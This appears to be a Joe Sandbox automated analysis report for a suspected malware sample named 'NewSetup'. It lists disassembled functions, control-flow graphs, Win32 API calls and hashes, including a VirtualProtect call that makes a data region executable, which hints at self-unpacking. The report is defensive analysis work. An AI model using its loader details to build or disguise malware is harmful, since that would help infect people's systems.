                                                                                                      • Opcode ID: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction ID: 565aefc227ced5ad5257567fe2b2c933cfdc61f65f9d5bc2f76fcf075f646e00
                                                                                                      • Opcode Fuzzy Hash: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
                                                                                                      • Instruction Fuzzy Hash: 3D21F635A21322BBC7318FA5FD48A5E7759AB46360F350113FD06A7690D770ED20CAD0
                                                                                                      Function 00211750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 127 211750-2117eb call 229c30 130 211806-21180b 127->130 131 2117ed-211803 127->131 132 21181b-211821 130->132 133 21180d-211816 130->133 131->130 136 211851-211855 132->136 137 211823-211825 132->137 135 211b69-211b8c 133->135 139 211be4-211c48 call 212f00 call 2132c0 call 22060c 135->139 140 211b8e-211b95 call 21d748 135->140 138 211858-211898 call 214460 136->138 137->136 141 211827-211849 call 212c50 137->141 164 2118ca-2118e0 138->164 165 21189a-2118b4 138->165 139->135 152 211b97-211b9a call 2138e0 140->152 153 211b9f-211bad 140->153 141->135 150 21184f 141->150 150->138 152->153 157 211bd1-211be3 153->157 158 211baf-211bce 153->158 158->157 166 2118e6-2118f5 164->166 167 2119b9 164->167 165->164 183 2118b6-2118c6 165->183 169 2119bb-2119c1 166->169 170 2118fb 166->170 167->169 172 2119ff-211a03 169->172 173 211900-211914 170->173 176 211a92-211a96 172->176 177 211a09-211a11 172->177 174 211940-211965 173->174 175 211916-21191d 173->175 185 211968-211972 174->185 175->174 181 21191f-21192f 175->181 179 211b54-211b61 176->179 180 211a9c-211aa6 176->180 177->176 182 211a13-211a59 177->182 179->135 180->179 184 211aac 180->184 181->185 202 211a68-211a89 call 21def0 182->202 203 211a5b-211a62 182->203 183->164 188 211ab0-211ac4 184->188 190 211974-211992 185->190 191 2119aa-2119b2 185->191 193 211af0-211b1c 188->193 194 211ac6-211acd 188->194 190->173 196 211998-2119a8 190->196 192 2119b5-2119b7 191->192 192->169 200 211b1e-211b47 193->200 205 211b4f 193->205 194->193 197 211acf-211ae3 194->197 196->192 199 211ae5 197->199 197->200 199->205 200->188 204 211b4d 200->204 210 211a8b-211a8d 202->210 203->202 206 2119d0-2119dd 203->206 204->179 205->179 208 2119e0-2119fc 206->208 208->172 210->208
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 4218353326-1866435925
                                                                                                      • Opcode ID: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction ID: 532315da9c31262536a987e23da17491656ef861286c06dc28025179f88ff773
                                                                                                      • Opcode Fuzzy Hash: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction Fuzzy Hash: 6CF1CE75A102188FCB14CF68C494BADBBF2FF88324F198269E915AB391D774AD51CF90
                                                                                                      Function 00225349 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 212 225349-225354 213 225356-225369 call 2276e4 call 227dcf 212->213 214 22536a-22537d call 2253da 212->214 219 2253ab 214->219 220 22537f-22539c CreateThread 214->220 224 2253ad-2253b9 call 22542a 219->224 222 2253ba-2253bf 220->222 223 22539e-2253aa GetLastError call 22770a 220->223 228 2253c1-2253c4 222->228 229 2253c6-2253ca 222->229 223->219 228->229 229->224
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00225392
                                                                                                      • GetLastError.KERNEL32(?,?,?,00212513,00000000,00000000), ref: 0022539E
                                                                                                      • __dosmaperr.LIBCMT ref: 002253A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744730728-0
                                                                                                      • Opcode ID: 59b772d52746fc60a858ec35e82a306c03d481c23bd0dc25e45a6bc31e5549a1
                                                                                                      • Instruction ID: b18607044b1db3640f79d030db46bfde825905ccdd127bca016e32fb100ff8d6
                                                                                                      • Opcode Fuzzy Hash: 59b772d52746fc60a858ec35e82a306c03d481c23bd0dc25e45a6bc31e5549a1
                                                                                                      • Instruction Fuzzy Hash: 3A01407252563ABBDF15EFE4FC09AAE7B65FF01351F108099F80196150EBB0D960DB50
                                                                                                      Function 002254EE Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 232 2254ee-2254fb call 22c2bb 235 22553b-22553e ExitThread 232->235 236 2254fd-225505 232->236 236->235 237 225507-22550b 236->237 238 225512-225518 237->238 239 22550d call 22ce1b 237->239 241 225525-22552b 238->241 242 22551a-22551c 238->242 239->238 241->235 244 22552d-22552f 241->244 242->241 243 22551e-22551f CloseHandle 242->243 243->241 244->235 245 225531-225535 FreeLibraryAndExitThread 244->245 245->235
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C2BB: GetLastError.KERNEL32(00000000,?,002276E9,0022D306,?,?,0022C1B7,00000001,00000364,?,00000006,000000FF,?,00225495,00248E38,0000000C), ref: 0022C2BF
                                                                                                        • Part of subcall function 0022C2BB: SetLastError.KERNEL32(00000000), ref: 0022C361
                                                                                                      • CloseHandle.KERNEL32(?,?,?,002253D9,?,?,002254CE,00000000), ref: 0022551F
                                                                                                      • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,002253D9,?,?,002254CE,00000000), ref: 00225535
                                                                                                      • ExitThread.KERNEL32 ref: 0022553E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 1991824761-0
                                                                                                      • Opcode ID: c8a94e912060c5ec5f8c664221151833a432d72b3a4272ce21ff6b1d367c8a4f
                                                                                                      • Instruction ID: 790f663b92db6b76949d1fb0902090e2626aaeb0d3362b3190f1ec0fd6001d63
                                                                                                      • Opcode Fuzzy Hash: c8a94e912060c5ec5f8c664221151833a432d72b3a4272ce21ff6b1d367c8a4f
                                                                                                      • Instruction Fuzzy Hash: B0F05470110E3277CB256FF5F84C61A3A9AAF01370B58C614F869CB1A0DB30DD728751
                                                                                                      Function 0022565F Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,00225721,00228396,00228396,?,00000002,456001D6,00228396,00000002), ref: 00225670
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00225721,00228396,00228396,?,00000002,456001D6,00228396,00000002), ref: 00225677
                                                                                                      • ExitProcess.KERNEL32 ref: 00225689
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 4439a6869094a0b3b79fa7517e97f11c26ab166e2903c07a5bd897a18da92111
                                                                                                      • Instruction ID: b39eda23bee40f3af56c62292d2fcdbba9a93c79fb693b12e12af97d2700a9bc
                                                                                                      • Opcode Fuzzy Hash: 4439a6869094a0b3b79fa7517e97f11c26ab166e2903c07a5bd897a18da92111
                                                                                                      • Instruction Fuzzy Hash: 75D09235010628BBCF116FA1FC4D8A93F2AEF42782B848011B9594A072DF329962DA85
                                                                                                      Function 00233BF4 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 353 233bf4-233c16 354 233e09 353->354 355 233c1c-233c1e 353->355 358 233e0b-233e0f 354->358 356 233c20-233c3f call 227f78 355->356 357 233c4a-233c6d 355->357 364 233c42-233c45 356->364 360 233c73-233c79 357->360 361 233c6f-233c71 357->361 360->356 363 233c7b-233c8c 360->363 361->360 361->363 365 233c9f-233caf call 233f21 363->365 366 233c8e-233c9c call 2329a2 363->366 364->358 371 233cb1-233cb7 365->371 372 233cf8-233d0a 365->372 366->365 373 233ce0-233cf6 call 233f9e 371->373 374 233cb9-233cbc 371->374 375 233d61-233d81 WriteFile 372->375 376 233d0c-233d12 372->376 396 233cd9-233cdb 373->396 379 233cc7-233cd6 call 234365 374->379 380 233cbe-233cc1 374->380 382 233d83-233d89 GetLastError 375->382 383 233d8c 375->383 377 233d14-233d17 376->377 378 233d4d-233d5a call 2343cd 376->378 384 233d39-233d4b call 234591 377->384 385 233d19-233d1c 377->385 395 233d5f 378->395 379->396 380->379 386 233da1-233da4 380->386 382->383 390 233d8f-233d9a 383->390 403 233d34-233d37 384->403 391 233da7-233da9 385->391 392 233d22-233d2f call 2344a8 385->392 386->391 397 233e04-233e07 390->397 398 233d9c-233d9f 390->398 399 233dd7-233de3 391->399 400 233dab-233db0 391->400 392->403 395->403 396->390 397->358 398->386 406 233de5-233deb 399->406 407 233ded-233dff 399->407 404 233db2-233dc4 400->404 405 233dc9-233dd2 call 227770 400->405 403->396 404->364 405->364 406->354 406->407 407->364
                                                                                                      APIs
                                                                                                        • Part of subcall function 00233F9E: GetConsoleOutputCP.KERNEL32(456001D6,00000000,00000000,?), ref: 00234001
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00228584,?), ref: 00233D79
                                                                                                      • GetLastError.KERNEL32(?,?,00228584,?,002287C8,00000000,?,00000000,002287C8,?,?,?,00248FE8,0000002C,002286B4,?), ref: 00233D83
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2915228174-0
                                                                                                      • Opcode ID: 768f45cb0a7f468ec24fffcabc6a77a6127f3444ff9eca8db259cbffcedf3aee
                                                                                                      • Instruction ID: 5a39c134629971e4e9c83e85a6893a4feeb8c1915586cbf5b8ff8a14a264b009
                                                                                                      • Opcode Fuzzy Hash: 768f45cb0a7f468ec24fffcabc6a77a6127f3444ff9eca8db259cbffcedf3aee
                                                                                                      • Instruction Fuzzy Hash: 386191F592411AAFDF11DFA8D885AEEBBB9BF09314F140586E800A7251D771DB21CBA0
                                                                                                      Function 002343CD Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 410 2343cd-234422 call 220050 413 234497-2344a7 call 21a6e1 410->413 414 234424 410->414 415 23442a 414->415 417 234430-234432 415->417 419 234434-234439 417->419 420 23444c-234471 WriteFile 417->420 421 234442-23444a 419->421 422 23443b-234441 419->422 423 234473-23447e 420->423 424 23448f-234495 GetLastError 420->424 421->417 421->420 422->421 423->413 425 234480-23448b 423->425 424->413 425->415 426 23448d 425->426 426->413
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00233D5F,00000000,002287C8,?,00000000,?,00000000), ref: 00234469
                                                                                                      • GetLastError.KERNEL32(?,00233D5F,00000000,002287C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00228584), ref: 0023448F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: 0ab598ab955fbdca7f0558e457921a157813a620e1bd3e57b5e98722d3ee0bd0
                                                                                                      • Instruction ID: ef9cfe421feaf601efe7e22b6ea109072497bbbf1c53682554f87ddf8ef16b5b
                                                                                                      • Opcode Fuzzy Hash: 0ab598ab955fbdca7f0558e457921a157813a620e1bd3e57b5e98722d3ee0bd0
                                                                                                      • Instruction Fuzzy Hash: 7321AD74A10219DBCF19DF29DC80AE9B7B9FB49305F2440E9EA06D7211D630EE52CF60
                                                                                                      Function 002190F0 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 427 2190f0-219130 call 21efc1 430 2191c7-2191c9 call 21b317 427->430 431 219136-21913d 427->431 434 2191ce-2191df call 21b317 430->434 433 219143-219149 431->433 431->434 435 219174-21919a call 21efd2 call 2192f0 433->435 436 21914b-219172 call 21efd2 433->436 443 21919f-2191aa 434->443 435->443 445 2191b6-2191c6 436->445 443->445 446 2191b1 call 21a660 443->446 446->445
                                                                                                      APIs
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002191C9
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002191D7
                                                                                                        • Part of subcall function 0021EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00218E4A,0021A2F0), ref: 0021EFE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3666349979-0
                                                                                                      • Opcode ID: 796bfb3b07f573f8f48dc2f4906c322af013e3d2f137380f5f9f612c67868b8c
                                                                                                      • Instruction ID: c08171889a8f7baf86b3bc1ff9d446316846aa08f89bc08ffcc4a901d728903e
                                                                                                      • Opcode Fuzzy Hash: 796bfb3b07f573f8f48dc2f4906c322af013e3d2f137380f5f9f612c67868b8c
                                                                                                      • Instruction Fuzzy Hash: 3321F1B0A0064A9BDB109F64CD45BEEBBF4FF14320F144228E92967381D774A9A5CBD2
                                                                                                      Function 0022DA52 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 449 22da52-22da57 450 22da59-22da71 449->450 451 22da73-22da77 450->451 452 22da7f-22da88 450->452 451->452 453 22da79-22da7d 451->453 454 22da9a 452->454 455 22da8a-22da8d 452->455 456 22daf4-22daf8 453->456 459 22da9c-22daa9 GetStdHandle 454->459 457 22da96-22da98 455->457 458 22da8f-22da94 455->458 456->450 460 22dafe-22db01 456->460 457->459 458->459 461 22dad6-22dae8 459->461 462 22daab-22daad 459->462 461->456 464 22daea-22daed 461->464 462->461 463 22daaf-22dab8 GetFileType 462->463 463->461 465 22daba-22dac3 463->465 464->456 466 22dac5-22dac9 465->466 467 22dacb-22dace 465->467 466->456 467->456 468 22dad0-22dad4 467->468 468->456
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0022D941,00249330,0000000C), ref: 0022DA9E
                                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0022D941,00249330,0000000C), ref: 0022DAB0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: e0b17d9ba95ae17bd47b19f0bebe3b21e13688c43ca6ed483947550a30535d26
                                                                                                      • Instruction ID: ff197ad9c3d5a1439ce2a49f54e730bad2586fc43b49c0707c78207cde165d38
                                                                                                      • Opcode Fuzzy Hash: e0b17d9ba95ae17bd47b19f0bebe3b21e13688c43ca6ed483947550a30535d26
                                                                                                      • Instruction Fuzzy Hash: F811DA7152C7A36EC7308EBEAC8CA227A95BB57330B38075AD0B6865F1CAB5D856D101
                                                                                                      Function 00211EF0 Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
                                                                                                      • FreeConsole.KERNELBASE(?,?,?,?,?,0021173F,?,?,?,00000000,?), ref: 00211F21
                                                                                                      • VirtualProtect.KERNELBASE(0024A011,00000549,00000040,?), ref: 00211F78
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1248733679-0
                                                                                                      • Opcode ID: 49e6c4b92792705b5a1dc96a104e864d285f1109f68066fae117dc3af92560a0
                                                                                                      • Instruction ID: 0b9a85ff06412e2f4ed78b7edde90010eb5fecaf49a0b7147175cfd4ff0006ad
                                                                                                      • Opcode Fuzzy Hash: 49e6c4b92792705b5a1dc96a104e864d285f1109f68066fae117dc3af92560a0
                                                                                                      • Instruction Fuzzy Hash: 39110675A502086BDB04BB64AC07FFE77B8EB45700F104429FA04A72C2E67599B04BD5
                                                                                                      Function 00225470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00248E38,0000000C), ref: 00225483
                                                                                                      • ExitThread.KERNEL32 ref: 0022548A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: c69dd99bb09a922fde654a1d2e203f6f99d725a9768dbf426a075d4eda07d913
                                                                                                      • Instruction ID: 684c3e71bac80ecebaaf752a89f529941c138bf8faf5a8a9cf365e9e073d18b0
                                                                                                      • Opcode Fuzzy Hash: c69dd99bb09a922fde654a1d2e203f6f99d725a9768dbf426a075d4eda07d913
                                                                                                      • Instruction Fuzzy Hash: 71F08C75A60625AFDB10AFB0E84EA6E7B70EF02711F208059F40597292CB7469A2CF91
                                                                                                      Function 00212270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00212288
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0021229C
                                                                                                        • Part of subcall function 00211FB0: CreateFileA.KERNELBASE ref: 00212036
                                                                                                        • Part of subcall function 00211FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
                                                                                                        • Part of subcall function 00211FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0021206B
                                                                                                        • Part of subcall function 00211FB0: CloseHandle.KERNELBASE(00000000), ref: 0021207A
                                                                                                        • Part of subcall function 00211FB0: _strlen.LIBCMT ref: 002120CD
